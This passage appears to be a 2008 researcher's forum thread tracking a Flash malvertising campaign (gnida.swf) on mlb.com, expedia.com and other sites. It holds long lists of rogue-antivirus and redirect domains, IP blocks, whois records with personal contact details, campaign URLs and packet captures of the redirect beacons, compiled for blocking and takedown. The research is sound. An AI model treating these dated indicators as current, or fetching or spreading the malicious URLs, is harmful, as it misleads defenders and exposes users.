246. Reparemenaces.com
247. Repareya.com
248. Rimuoviciarpame.com
249. Riparaminacce.com
250. Riparasubito.com
251. Riservatezzanet.com
252. Safeharddrive.com
253. Safepctool.com
254. Safudaijoubu.com
255. Salvaspaziosudisco.com
256. Sansendommagement.com
257. Sansinfections.com
258. Sayonarabaggu.com
259. Schijfbewaker.com
260. Schijfcontroleur.com
261. Schijfredder.com
262. Schijfruimteredder.com
263. Schutzderdaten.com
264. Schutzfuerpc.com
265. Schutztool.com
266. Secretissimosoft.com
267. Secretopertutti.com
268. Secretosasalvo.com
269. Secretoseguro.com
270. Securepccleaner.com
271. Sefunahimitsu.com
272. Sekretessforsvarare.com
273. Senzadoppioni.com
274. Shingaidome.com
275. Shinraihogo.com
276. Shinraipafomansu.com
277. Shisutemudifensu.com
278. Sichererantivirus.com
279. Sichererschutz.com
280. Sicherheitstool.com
281. Sikkerbrukere.com
282. Sikkerpcredskap.com
283. Sikkersystem.com
284. Sinataques.com
285. Sinrrastros.com
286. Sinsenales.com
287. Sistemaprotegido.com
288. Sistemupyua.com
289. Sisutemuantei.com
290. Sisutemuorugurin.com
291. Skyddsprogram.com
292. Smittfri.com
293. Solelunaantivirus.com
294. Speichertool.com
295. Spyguardpro.com
296. Spywaretaisakumaster.com
297. Stopbedreiging.com
298. Stopminacce.com
299. Storageprotector.com
300. Succesantivirus.com
301. Superanonimo.com
302. Surfforsure.com
303. Surfremover.com
304. Sutoppuwirusu.com
305. Syssauvegarde.com
306. Systemerrorfixer.com
307. Systemesansfaute.com
308. Systemesansvirus.com
309. Systemhoover.com
310. Systemschild.com
311. Tackanejvirus.com
312. Tilforlatelig.com
313. Toolsicuro.com
314. Topsalgantivirus.com
315. Trasheraser.com
316. Trojansfilter.com
317. Trusselovervagning.com
318. Trustedantivirus.com
319. Trustedprotection.com
320. Tryggpcverktyg.com
321. Trygpcbruger.com
322. Turnkeyantivirus.com
323. Unidadessanas.com
324. Usuarioprotegido.com
325. Utiledereparation.com
326. Utilisateursur.com
327. Vaktmotvirus.com
328. Veiligheidsagent.com
329. Virenvernichter.com
330. Virusbekaemper.com
331. Virusgarde.com
332. Viruskrakker.com
333. Virussperr.com
334. Virusurimuva.com
335. Virusvanger.com
336. Virusvijand.com
337. Volumformatredskap.com
338. Wegvonviren.com
339. Winanonymous.com
340. Winpcdoctor.com
341. Winsecureav.com
342. Winspycontrol.com
343. Wirusufinisshu.com
344. Wirusuk.com
345. Wirusukyua.com
346. Wirusushattodaun.com
347. Wirusushuryo.com
348. Yourprivacyguard.com
349. Yuzasefu.com
350. Zentaiwakuchin.com

24.244.171.69

1. 2greatfind.com
2. 2quickfind.com
3. Alg-search.com
4. All-search-it.com
5. Bestdatafinder.com
6. Besteversearch.com
7. Bi-bi-search.com
8. Bucksbill.com
9. Candid-search.com
10. Cha-cha-search.com
11. Cleanator.com
12. Clever-at-search.com
13. Deuscleaneronline.com
14. Deuspayment.com
15. Didosearch.com
16. Fandasearch.com
17. Fati-gati-search.com
18. Favourable-search.com
19. Feel-search.com
20. Findbyall.com
21. Firstbestsearch.com
22. Firstlastsearch.com
23. Fokus-search.com
24. Force-search.com
25. Fulsearch.com
26. Glass-search.com
27. Gt-search.com
28. Ideal-search.com
29. Individ-search.com
30. Initial-search.com
31. Kazilkasearch.com
32. Loffersearch.com
33. Londasearch.com
34. Mad-search.com
35. Myusefulsearch.com
36. Nudesweetmature.com
37. Ol-search.com
38. Original-search.com
39. Se7ensearch.com
40. Search-and-win.com
41. Search-angle.com
42. Search-deal.com
43. Search-expand.com
44. Search-into.com
45. Search-the-best.com
46. Search-the-prey.com
47. Search-west.com
48. Searchcompleteness.com
49. Searchmandrake.com
50. Searchonline-ease.com
51. Searchoperation.com
52. Searchvirtuoso.com
53. Simplesamplesearch.com
54. Such-search.com
55. The-same-search.com
56. Treekindsearch.com
57. Type-and-find.com
58. Ultimatepayment.com
59. Unicsearch.com
60. Wewillfind.com
61. Windfiresearch.com

193.227.121.34

1. Superiordatingsite.com
2. Surveypaiz.com

24.244.170.178

1. statsgod.com

Associated IP's (download centers)

content.onerateld.com - 209.8.114.5

canonical name g1.panthercdn.com
Domain Name: ONERATELD.COM
Registrar: YESNIC CO. LTD.
Name Server: NS1.ONERATELD.COM
Name Server: NS2.ONERATELD.COM
Updated Date: 07-dec-2007
Creation Date: 26-dec-2006
Expiration Date: 26-dec-2008

sec.storageguardsoft.com - 209.8.114.8

canonical name g1.panthercdn.com
Domain Name: STORAGEGUARDSOFT.COM
Registrar: YESNIC CO. LTD.
Name Server: NS9.NSCACHE.NET
Name Server: NS8.NSCACHE.NET
Updated Date: 03-dec-2007
Creation Date: 07-dec-2006
Expiration Date: 07-dec-2008

Other domains hosting gnida.swf

aheadad.com - 205.252.251.18

Server Type: Apache/1.3.37 (Unix) PHP/5.2.3
IP Location - Alaska - Ketchikan - Beyond The Network America Inc
Reverse IP: 7 other sites hosted on this server.

::Domain servers in listed order::
ns2.ah-dns.com
ns1.ah-dns.com

::Dates & Status::
Creation Date: 12-Oct-2007
Expiration Date: 12-Oct-2008
Status:ACTIVE

Websites.

1. Aheadad.com
2. Fuckmomsladyfriend.com
3. Gayfunworld.com
4. Gayteenplace.com
5. Hotfreebbw.com
6. Onlyshemale.net
7. Plumppornvideo.com
8. Windowssecurecenter.com

Flash swf files hit the news again. Unfortunately this time were are not talking about redirects to fake spyware alerts but about getting redirected to a porn site with streaming video content.

An advertisement for Chanel watches hosted by ad.doubleclick and showed on The Official Site of Major League Baseball (mlb.com) is indeed redirecting people to hqtube.com.
The advert in question is ad.doubleclick.net/1674952/mlb_chanel.swf

Again you can find the culprit back by examining the HTTP refers when you enter the hqtube.com website. Furthermore hqtube.com sets a cookie containing a reference to the same ad.doubleclick swf file.

The user is also prompted to install the Chinese language pack when entering hqtube.com

Mlb.com has a page for people with slow connections. It doesn’t play the flash adverts. If you don’t want to block ads or disable Flash, use that link instead of the normal homepage. You won’t get redirected.

Narrow broadband link:
http://mlb.mlb.com/mlb/homepage/narrowband.jsp

Full story by Sandi Hardmeier.
MLB.COM users hijacked and redirected to pornographic web site, complete with graphic videos - DOUBLECLICK involved

hqtube.com - 88.85.66.116

Server Type: nginx/0.3.51
IP Location - Utrecht - Utrecht - Webazilla

Registration Service Provided By: Enom, Inc

Administrative Contact:
ICOO SOFT LTD
Vadim Fatkullin ()
+357.25341300
Fax: +357.25342030
Gladstonos 120-C2
Lemesos, 3032
CY

Status: Locked

Name Servers:
ns1.serverfield.com
ns2.serverfield.com
ns3.serverfield.com
ns4.serverfield.com

Creation date: 14 Aug 2006 14:42:05
Expiration date: 14 Aug 2008 14:42:05

Websites hosted on 88.85.66.116

1. Filespray.com
2. Hqtube.com

newbieadguide.com - vozemiliogaranon.com - thetechnorati.com - akamahi.net - ?

Time to update your IP blocks, the guys moved ...

91.199.50.14 - akamahi.net
91.199.50.15 - newbieadguide.com
91.199.50.16 - thetechnorati.com
91.199.50.17 - vozemiliogaranon.com
91.199.50.18 - ?

91.199.50.14 - 91.199.50.18

QUOTE

inetnum: 91.199.50.0 - 91.199.50.255
netname: NETROUTING-01
descr: Netrouting Data Facilities
country: NL
org: ORG-NDF1-RIPE
admin-c: SBT10-RIPE
tech-c: SBT10-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: ECATEL-MNT
mnt-routes: ECATEL-MNT
mnt-domains: ECATEL-MNT
source: RIPE # Filtered

organisation: ORG-NDF1-RIPE
org-name: Netrouting Data Facilities
org-type: OTHER
address: Van Halewijnlaan 319
address: 2274 TK Voorburg
address: The Netherlands
phone: +31 654 620 994
abuse-mailbox:
mnt-ref: GFX-MNT
mnt-by: GFX-MNT
source: RIPE # Filtered

person: S Bout
org: ORG-NDF1-RIPE
address: Van Halewijnlaan 319
address: 2274 TK Voorburg
address: The Netherlands
phone: +31 654 620 994
nic-hdl: SBT10-RIPE
source: RIPE # Filtered

route: 91.199.50.0/24
descr: Netrouting Data Facilities
origin: AS16131
mnt-by: GFX-MNT
source: RIPE # Filtered

As always keep an eye on Sandi Hardmeier's blog too.
http://msmvps.com/blogs/spywaresucks/default.aspx

And the move keeps going on !

mysurvey4u.com - 194.110.67.22

Server Type: nginx/0.4.13
IP Location - Noord-holland - Amsterdam - Netrouting Data Facilities
Domain Name : mysurvey4u.com

::Name Servers::
ns1.mysurvey4u.com
ns2.mysurvey4u.com

::Dates & Status::
Created Date 2006-12-04 09:57:28 EST
Updated Date 2007-12-03 20:06:35 EST
Valid Date 2008-12-04 09:57:28 EST
Status ACTIVE

Websites

1. Mysurvey4u.com
2. Singlemetro.com

______________________________

traveltray.com - 194.110.67.23

Server Type: nginx/0.4.13
IP Location - Noord-holland - Amsterdam - Netrouting Data Facilities

::Name Servers::
NS1.TRAVELTRAY.COM 190.15.73.251
NS2.TRAVELTRAY.COM 190.15.73.252

::Dates & Status::
Record last updated on 02-Jun-2007.
Record expires on 01-Jul-2008.
Record created on 01-Jul-2004.
Domain status: clientTransferProhibited - clientUpdateProhibited

Websites

1. Specificissue.com
2. Traveltray.com

______________________________

netmediagroup.net - 84.243.252.91

Server Type: nginx/0.4.13
IP Location - Netherlands - Gfx-cust-worldstream
Dedicated Hosting: netmediagroup.net is hosted on a dedicated server.

::Name Servers::
ns1.netmediagroup.net
ns2.netmediagroup.net

::Dates & Status::
Created Date 2006-06-29 05:38:33 EDT
Updated Date 2007-06-27 17:59:00 EDT
Valid Date 2008-06-29 05:38:33 EDT
Status ACTIVE
______________________________

traffalo.com - 84.243.252.94

Server Type: nginx/0.4.13
IP Location - Netherlands - Gfx-cust-worldstream
Dedicated Hosting: traffalo.com is hosted on a dedicated server.

::Name Servers::
NS1.TRAFFALO.COM 190.15.73.251
NS2.TRAFFALO.COM 190.15.73.252

::Dates & Status::
Record last updated on 26-Apr-2007.
Record expires on 13-Apr-2008.
Record created on 13-Apr-2007.
Domain status: clientTransferProhibited - clientUpdateProhibited
______________________________

uniqads.com - 84.243.252.97

Server Type: nginx/0.4.13
IP Location - Netherlands - Gfx-cust-worldstream
Dedicated Hosting: uniqads.com is hosted on a dedicated server.

::Name Servers::
NS2.UNIQADS.COM 190.15.73.252
NS1.UNIQADS.COM 190.15.73.251

::Dates & Status::
Record last updated on 08-Jun-2007.
Record expires on 27-Apr-2008.
Record created on 27-Apr-2007.
Domain status: ok

Blocks

inetnum: 84.243.221.0 - 84.243.221.255
netname: GFX-CUST-NETROUTING
descr: Netrouting Data Facilities
org: ORG-NDF1-RIPE
country: NL
admin-c: SBT10-RIPE
tech-c: SBT10-RIPE
status: ASSIGNED PA
mnt-by: GFX-MNT

inetnum: 194.110.67.0 - 194.110.67.255
netname: NETROUTING-01
descr: Netrouting Data Facilities
country: NL
org: ORG-NDF1-RIPE
admin-c: SBT10-RIPE
tech-c: SBT10-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: GFX-MNT
mnt-routes: GFX-MNT
mnt-domains: GFX-MNT

inetnum: 91.199.50.0 - 91.199.50.255
netname: NETROUTING-01
descr: Netrouting Data Facilities
country: NL
org: ORG-NDF1-RIPE
admin-c: SBT10-RIPE
tech-c: SBT10-RIPE
status: ASSIGNED PI
mnt-by: RIPE-NCC-HM-PI-MNT
mnt-lower: RIPE-NCC-HM-PI-MNT
mnt-by: ECATEL-MNT
mnt-routes: ECATEL-MNT
mnt-domains: ECATEL-MNT

akamahi.net - newbieadguide.com - thetechnorati.com - vozemiliogaranon.com

Time to update your IP blocks (again).

64.38.4.131 - akamahi.net
64.38.4.133 - newbieadguide.com
64.38.4.134 - thetechnorati.com
64.38.62.234 - vozemiliogaranon.com

64.38.0.0 - 64.38.63.255

QUOTE

OrgName: FastServers, Inc.
OrgID: FASTS-1
Address: 175 W. Jackson Blvd
Address: Suite 1770
City: Chicago
StateProv: IL
PostalCode: 60604
Country: US

ReferralServer: rwhois://rwhois.fastservers.net:4321/

NetRange: 64.38.0.0 - 64.38.63.255
CIDR: 64.38.0.0/18
NetName: FASTSERVERS-CF
NetHandle: NET-64-38-0-0-1
Parent: NET-64-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.FASTSERVERS.NET
NameServer: NS2.FASTSERVERS.NET
Comment:
RegDate: 2005-07-12
Updated: 2006-03-22

== Additional Information From rwhois://rwhois.fastservers.net:4321/ ==

network:Class-Name:network
network:ID:64-38-62-232-29.64.38.0.0/18
network:Auth-Area:64.38.0.0/18
network:Network-Name:64-38-62-232/29
network:IP-Network:64.38.62.232/29
network:Organization;I:CID-21976.64.38.0.0/18
network:Tech-Contact;I:
network:Admin-Contact;I:
network:Updated:20080111
network:Updated-By:

network:Class-Name:network
network:ID:FASTSERVERS-CF.64.38.0.0/18
network:Auth-Area:64.38.0.0/18
network:Network-Name:CF-64.38.0.0
network:IP-Network:64.38.0.0/18
network:Organization;I:FastServers, Inc
network:Tech-Contact;I:
network:Admin-Contact;I:FASTS-ARIN
network:Created:20050913
network:Updated:20060322
network:Updated-By:

Resolve Host: server1.cpvadvertizing.com

A cpvadvertizing.com
PTR server1.cpvadvertizing.com
NS ns1.cpvadvertizing.com 85.17.4.1
NS ns2.cpvadvertizing.com 85.17.4.2

IP's using PTR to this host:

• 64.38.4.130
• 64.38.4.131
• 64.38.4.132
• 64.38.4.133
• 64.38.4.134
• 64.38.62.234

Other domains hosting gnida.swf

More Netrouting Data Facilities

workhomecenter.com - 194.110.67.25

Server Type: nginx/0.4.13
IP Location - Noord-holland - Amsterdam - Netrouting Data Facilities

::Domain servers in listed order::
NS1.WORKHOMECENTER.COM 190.15.73.251
NS2.WORKHOMECENTER.COM 190.15.73.252

::Dates & Status::
Record last updated on 22-May-2007.
Record expires on 28-Feb-2008.
Record created on 28-Feb-2002.
Domain status: ok

Websites.

1. Theirtrade.com
2. Workhomecenter.com

______________________________

casinoaceking.com - 194.110.67.19

Server Type: nginx/0.4.13
IP Location - Noord-holland - Amsterdam - Netrouting Data Facilities

::Domain servers in listed order::
NS2.CASINOACEKING.COM 190.15.73.252
NS1.CASINOACEKING.COM 190.15.73.251

::Dates & Status::
Record last updated on 10-Dec-2007.
Record expires on 09-Jan-2009.
Record created on 09-Jan-2002.
Domain status: ok

Websites.

1. Casinoaceking.com
2. Regularhelp.com

______________________________

getfreecar.com - 194.110.67.22

Server Type: nginx/0.4.13
IP Location - Noord-holland - Amsterdam - Netrouting Data Facilities

::Domain servers in listed order::
NS1.GETFREECAR.COM 190.15.73.251
NS2.GETFREECAR.COM 190.15.73.252

::Dates & Status::
Record last updated on 05-Sep-2007.
Record expires on 07-Jul-2008.
Record created on 07-Jul-2003.
Domain status: ok

Websites.

1. Getfreecar.com
2. Singledaily.com

______________________________

gnida.swf is present on each of these domains.

In case you are curious how these redirects work, you can watch the video below. Unless explicitly clicked, most windows are closed using ALT+F4.
Note: Flash Player is needed.



The malicious banner on DiePresse.com is still active at the time of the writeup, so block or turn off Flash if you surf over there.

www.rhapsody.com

The campaign on DiePresse has been suspended but the banner is still hosted on their server. A new banner was reported recently on www.rhapsody.com. The redirect doesn't occur when you enter the site. Searching for music or artists brings up the malicious advert. The file is hosted at i.realone.com and it's again the skyauction banner as seen below.

CODE

Frame 265 (452 bytes on wire, 452 bytes captured)
Internet Protocol, Src: 192.168.x.x (192.168.x.x), Dst: newbieadguide.com (190.15.64.188)
Transmission Control Protocol, Src Port: 1980 (1980), Dst Port: http (80), Seq: 1, Ack: 1, Len: 398
Hypertext Transfer Protocol
    GET /statsa.php?u=23423424&campaign=mi1eroof HTTP/1.1\r\n
    Accept: */*\r\n
    Referer: http://i.realone.com/ads/Rollingstone/1_skyauction_728x90.swf?
clickTag=http://ad.doubleclick.net/click%3Bh=v8/3652/3/0/%2a/x%3B177176445%3B0\r\n
    x-flash-version: 9,0,47,0\r\n
    ~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~\r\n
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n
    Host: newbieadguide.com\r\n
    Connection: Keep-Alive\r\n
    \r\n

Banner: i.realone.com/ads/Rollingstone/1_skyauction_728x90.swf
Campaign: newbieadguide.com/statsa.php?u=23423424&campaign=mi1eroof

In meanwhile the bad guys kept on moving. They stayed a couple of days on Denit Internet Services in Amsterdam and now they are on the following IP's:

190.15.64.185 - akamahi.net
190.15.64.186 - ? - GET /swf/gnida.swf = ok
190.15.64.187 - ? - GET /swf/gnida.swf = ok
190.15.64.188 - newbieadguide.com
190.15.64.189 - ? - GET /swf/gnida.swf = ok
190.15.64.190 - quinquecahue.com
190.15.64.191 - thetechnorati.com
190.15.64.192 - vozemiliogaranon.com

QUOTE

% Joint Whois - whois.lacnic.net
% This server accepts single ASN, IPv4 or IPv6 queries


% Copyright LACNIC lacnic.net
% The data below is provided for information purposes
% and to assist persons in obtaining information about or
% related to AS and IP numbers registrations
% By submitting a whois query, you agree to use this data
% only for lawful purposes.
% 2008-01-25 15:11:36 (BRST -02:00)

inetnum: 190.15.64/20
status: allocated
owner: Secure Hosting Ltd.
ownerid: HN-SHLT-LACNIC
responsible: Secure Hosting Ltd.
address: Bufete Osorio, Edificio Palmira, --, 4th Floor
address: -- - Tegucigalpa - DC
country: HN
phone: +1 242 5028700 []
owner-c: RID2
tech-c: RID2
inetrev: 190.15.64/20
nserver: NS1.SECUREHOST.COM
nsstat: 20080121 AA
nslastaa: 20080121
nserver: NS2.SECUREHOST.COM
nsstat: 20080121 AA
nslastaa: 20080121
created: 20061006
changed: 20061006

nic-hdl: RID2
person: Richard Douglas
e-mail: support@SECUREHOST.COM
address: P.O. Box CB-13862, 00000,
address: CB13862 - Nassau - NP
country: BS
phone: +1 242 5028700
created: 20060127
changed: 20061006

% whois.lacnic.net accepts only direct match queries.
% Types of queries are: POCs, ownerid, CIDR blocks, IP
% and AS numbers.

www.expedia.com

This weekend we got some echoes about a malicious advertising banner on www.expedia.com. The campaign is very restrictive as most of the worldwide countries & continents are excluded. While visiting www.expedia.com, one advertising banner caught my attention though; the flash file was again protected /obfuscated using SWF Encrypt 4.x as seen below.

Thanks fly out to Cretemonster for confirming & checking out the advert since my geographic location is on the ban list.

CODE

Frame 44 (387 bytes on wire, 387 bytes captured)
Internet Protocol, Src: 192.168.x.x (192.168.x.x), Dst: quinquecahue.com (190.15.64.190)
Transmission Control Protocol, Src Port: 1042 (1042), Dst Port: http (80), Seq: 1, Ack: 1, Len: 333
Hypertext Transfer Protocol
    GET /statsa.php?u=1200655836&campaign=pygmalioni HTTP/1.1\r\n
    Accept: */*\r\n
    Accept-Language: en-US\r\n
    Referer: http://media.expedia.com/ads/FXSound/728x90.swf\r\n
    x-flash-version: 9,0,115,0\r\n
    Accept-Encoding: gzip, deflate\r\n
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n
    Host: quinquecahue.com\r\n
    Connection: Keep-Alive\r\n
    \r\n

Banner: media.expedia.com/ads/FXSound/728x90.swf
Campaign: quinquecahue.com/statsa.php?u=1200655836&campaign=pygmalioni

If someone does experience those SWF hijacks / redirects on other websites, don't hesitate to PM me about it. This needs to be stopped !

A search did reveal the existence of quite a few new banners / redirects over the last 48h. We all need your help because those banners target specific countries and block others. Below is a partial list of reported redirects on forums. If you know which banners are causing the redirects below or if you did experience such fake alerts, please contact me or Sandi.

When an advertising banner is found or when new campaigns pop up, I'll update this topic.

quinquecahue.com/swf/gnida.swf?campaign=tautonymus&u=1201174352

• Reported at www.webzdarma.cz forums.
• Allowed Country Codes - States / Cities - IP Ranges
  CZ, UA
• Banned Country Codes - States / Cities - IP Ranges
  89.250.0.0-89.250.255.255
  prague

CODE

Frame 387 (413 bytes on wire, 413 bytes captured)
Internet Protocol, Src: 192.168.x.x (192.168.x.x), Dst: quinquecahue.com (190.15.64.190)
Transmission Control Protocol, Src Port: 1190 (1190), Dst Port: http (80), Seq: 1, Ack: 1, Len: 359
Hypertext Transfer Protocol
    GET /statsa.php?u=1201174352&campaign=tautonymus HTTP/1.1\r\n
    Accept: */*\r\n
    Referer: http://i.wz.cz/bannery/firstchoice/firstchli.swf?clickthru=http://www.firstchoice.co.uk/?ref=A0991\r\n
    x-flash-version: 9,0,47,0\r\n
    ~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~\r\n
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n
    Host: quinquecahue.com\r\n
    Connection: Keep-Alive\r\n
    \r\n

Banner: i.wz.cz/bannery/firstchoice/firstchli.swf
______________________________

quinquecahue.com/swf/gnida.swf?campaign=atliverish&U=1200328388

• Reported at eforum.idg.se.
• Banned Country Code - States / Cities - IP Ranges
  85.18.0.0-85.18.255.255
  1.255.0.0-1.255.255.255
  7.3.0.0-7.3.255.255
  italy
  california, ohio

______________________________

quinquecahue.com/swf/gnida.swf?campaign=myrakehell&u=1200937882

• Reported at trojaner-board.de and forum.chip.de
• Allowed Country Codes - States / Cities - IP Ranges
  DE, AT, UA
• Banned Country Code - City - IP
  88.198.0.0-88.198.255.255
  217.6.0.0-217.6.255.255
  dortmund, radibor, berlin

Banner was reported to be present at onlinetvrecorder.com in the downloads section (which needs membership). According to the forum moderator the banner has been removed...
______________________________

quinquecahue.com/swf/gnida.swf?campaign=teachingor&u=1200504042

• Reported at www.index.hr
• Banned Country Code - States / Cities - IP Ranges
  70.84.0.0-70.84.255.255
  70.85.0.0-70.85.255.255
  209.85.0.0-209.85.255.255
  in, il
  texas, california, newyork
  dallas, mountainview, newyork

______________________________

quinquecahue.com/swf/gnida.swf?campaign=ifsequitur&u=1200654870

• Reported at www.bridicum.com (CSIS Security Group).
• Banned Country Codes - States / Cities - IP Ranges
  195.47.0.0-195.47.255.255
  84.16.255.255
  copenhagen

______________________________

traveltray.com/swf/gnida.swf?campaign=upmorpheus&u=1201009699

• Reported at forum.zeusnews.com - forum.ingegneri.info.
• Banned Country Codes - States / Cities - IP Ranges
  217.12.0.0-217.12.255.255 (Yahoo Europe)
  216.109.0.0-216.109.255.255 (us.rd.yahoo.com - 216.109.118.82)
  66.94.0.0-66.94.25.255 (f3.yahoofs.com - 66.94.226.22)
  UK
  california
  milano, milan, london, dublin, barcelona

In different countries (France, Italy ...) people complain about SWF redirects in their mailbox. If you are a victim of this, please contact us.
______________________________

03/02/2008

mysurvey4u.com/swf/gnida.swf?campaign=me9ntthe&u=1201951156171

• Reported at forums.myspace.com/p/3747055/37526266.aspx?fuseaction=forums.viewpost
• www.myspace.com IP :
  216.178.39.14
  216.178.38.130
  216.178.39.16
  216.178.39.15
  216.178.39.74
  216.178.39.12
  216.178.39.11
  216.178.39.13
  216.178.38.131
  216.178.38.129

______________________________

quinquecahue.com/swf/gnida.swf?campaign=atticismus&u=1201712577

• Reported at www.hispamp3.com/foros

______________________________

quinquecahue.com/statsg.php?u=1200592645&campaign=ofquixotic

• Reported at www.gaiaonline.com/forum/questions-assistance/ad-banner-infected-with-gnida-swf-trojan/t.37232985/
• The IP address of gaiaonline.com is 72.5.72.7, so 72.5.0.0-72.5.255.255 will be in the banned list.

______________________________

IP Resume

190.15.64.185 - akamahi.net
190.15.64.186 - ? - GET /swf/gnida.swf = ok
190.15.64.187 - ? - GET /swf/gnida.swf = ok
190.15.64.188 - newbieadguide.com
190.15.64.189 - ? - GET /swf/gnida.swf = ok
190.15.64.190 - quinquecahue.com
190.15.64.191 - thetechnorati.com
190.15.64.192 - vozemiliogaranon.com

190.15.73.254 - blessedads.com
______________________________

194.110.67.22 - mysurvey4u.com
194.110.67.25 - workhomecenter.com
194.110.67.19 - casinoaceking.com
194.110.67.22 - getfreecar.com
______________________________

84.243.252.94 - traffalo.com
______________________________

Changed.

content.onerateld.com - sec.storageguardsoft.com

66.244.254.11
66.244.254.201
66.244.254.239
85.17.4.101

QUOTE

Network Whois record
Queried whois.arin.net with "66.244.254.11"...

OrgName: Big Pipe Inc.
OrgID: BGPP
Address: Suite 400
Address: 630 - 3rd Ave. SW
City: Calgary
StateProv: AB
PostalCode: T2P-4L4
Country: CA

ReferralServer: rwhois://204.209.209.80:4321

NetRange: 66.244.192.0 - 66.244.255.255
CIDR: 66.244.192.0/18
NetName: BIGPIPE-2
NetHandle: NET-66-244-192-0-1
Parent: NET-66-0-0-0-0
NetType: Direct Allocation
NameServer: DNS1.BIGPIPEINC.COM
NameServer: DNS2.BIGPIPEINC.COM
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 2002-03-14
Updated: 2002-05-21

RTechHandle: ZB106-ARIN
RTechName: Big Pipe Inc
RTechPhone: +1-403-750-7428
RTechEmail: ipadmin_bigpipe@bigpipeinc.com

OrgAbuseHandle: BPA15-ARIN
OrgAbuseName: Shaw Business Solutions - Abuse
OrgAbusePhone: +1-866-244-7474
OrgAbuseEmail: abuse@shawbusinesssolutions.ca

OrgTechHandle: ZI94-ARIN
OrgTechName: Shaw Business Solutions
OrgTechPhone: +1-403-750-7428
OrgTechEmail: ipadmin@shawbusinesssolutions.ca

# ARIN WHOIS database, last updated 2008-02-03 19:03
# Enter ? for additional hints on searching ARIN's WHOIS database.

QUOTE

Network Whois record
Queried whois.ripe.net with "-B 85.17.4.101"...

% This is the RIPE Whois query server #1.
% The objects are in RPSL format.
%
% Rights restricted by copyright.
% See http://www.ripe.net/db/copyright.html

% Information related to '85.17.4.0 - 85.17.4.255'

inetnum: 85.17.4.0 - 85.17.4.255
netname: LEASEWEB
descr: LeaseWeb
descr: P.O. Box 93054
descr: 1090BB AMSTERDAM
descr: Netherlands
descr: www.leaseweb.com
remarks: Please send email to "abuse@leaseweb.com" for complaints
remarks: regarding portscans, DoS attacks and spam.
remarks: INFRA-AW
country: NL
admin-c: LSW1-RIPE
tech-c: LSW1-RIPE
status: ASSIGNED PA
mnt-by: OCOM-MNT
changed: ripe@ocom.com 20050320
changed: ripe@ocom.com 20060608
source: RIPE

person: RIP Mean
address: P.O. Box 93054
address: 1090BB AMSTERDAM
address: Netherlands
phone: +31 20 3162880
fax-no: +31 20 3162890
abuse-mailbox: abuse@leaseweb.com
e-mail: ripe@ocom.com
nic-hdl: LSW1-RIPE
notify: ripe@ocom.com
mnt-by: OCOM-MNT
changed: ripe@ocom.com 20050607
changed: ripe@ocom.com 20060215
changed: ripe@ocom.com 20060608
source: RIPE

% Information related to '85.17.0.0/16AS16265'

route: 85.17.0.0/16
descr: LEASEWEB
origin: AS16265
remarks: LeaseWeb
mnt-by: OCOM-MNT
changed: ripe@ocom.com 20050311
changed: ripe@ocom.com 20070610
source: RIPE

______________________________

Failed to resolve hostname.

adtraff.com
burnads.com
netmediagroup.net
uniqads.com
traveltray.com
aheadad.com
______________________________

Update 9 Feb. 2008

They are up again, except aheadad.com

adtraff.com - 84.243.252.84
burnads.com - 84.243.252.85
netmediagroup.net - 84.243.252.91
uniqads.com - 84.243.252.97

traveltray - 194.110.67.23

190.15.64.187 - ? - GET /swf/gnida.swf = ok

Finally got a name for that IP.

entrerrenglonadura.com - 190.15.64.187

IP Location - Francisco Morazan - Tegucigalpa - Secure Hosting Ltd
Created: 2007-11-23
Expires: 2008-11-23
Name Server: NS1.ENTRERRENGLONADURA.COM
Name Server: NS2.ENTRERRENGLONADURA.COM

Error Message
There was an error processing your request.

Domain Name : entrerrenglonadura.com

::Registrant::
Name : Entrerrenglonadura
Email : mail(at)entrerrenglonadura.com
Address : Pix str 12 Jordan
Zipcode : 1252
Nation : EC
Tel : 4858455
Fax :

::Administrative Contact::
Name : Entrerrenglonadura
Email : mail(at)entrerrenglonadura.com
Address : Pix str 12 Jordan
Zipcode : 1252
Nation : EC
Tel : 4858455
Fax :

::Technical Contact::
Name : Entrerrenglonadura
Email : mail(at)entrerrenglonadura.com
Address : Pix str 12 Jordan
Zipcode : 1252
Nation : EC
Tel : 4858455
Fax :

::Name Servers::
ns1.entrerrenglonadura.com
ns2.entrerrenglonadura.com
ns3.entrerrenglonadura.com
ns4.entrerrenglonadura.com

::Dates & Status::
Created Date 2007-11-23 05:03:25 EST
Updated Date 2007-11-23 05:03:25 EST
Valid Date 2008-11-23 05:03:25 EST
Status ACTIVE

human500.com - 71.18.200.75

Another domain came out of the box while doing some research today.

human500.com/bin/tremor/statsg.php

Not the usual folder but let's take a peek at the statsg.php file anyway. Interesting stuff ... we do find our gnida.swf back. So that's another one to blacklist.


Website Title: Human500 Project
ICANN Registrar: GODADDY.COM, INC.
Name Server: NS5.IXWEBHOSTING.COM
Name Server: NS6.IXWEBHOSTING.COM
Whois Server: whois.godaddy.com

Server Type: Apache
IP Location - Kentucky - Hopkinsville - Ecommerce Corporation
Created: 2006-08-29
Expires: 2008-08-29
Registrar Status: clientDeleteProhibited
Registrar Status: clientRenewProhibited
Registrar Status: clientTransferProhibited
Registrar Status: clientUpdateProhibited

Whois Record
Registrant:
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: HUMAN500.COM
Created on: 29-Aug-06
Expires on: 30-Aug-08
Last Updated on: 04-Sep-06

Administrative Contact:
Private, Registration
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States
(480) 624-2599 Fax -- (480) 624-2599

Technical Contact:
Private, Registration
Domains by Proxy, Inc.
DomainsByProxy.com
15111 N. Hayden Rd., Ste 160, PMB 353
Scottsdale, Arizona 85260
United States
(480) 624-2599 Fax -- (480) 624-2599

Domain servers in listed order:
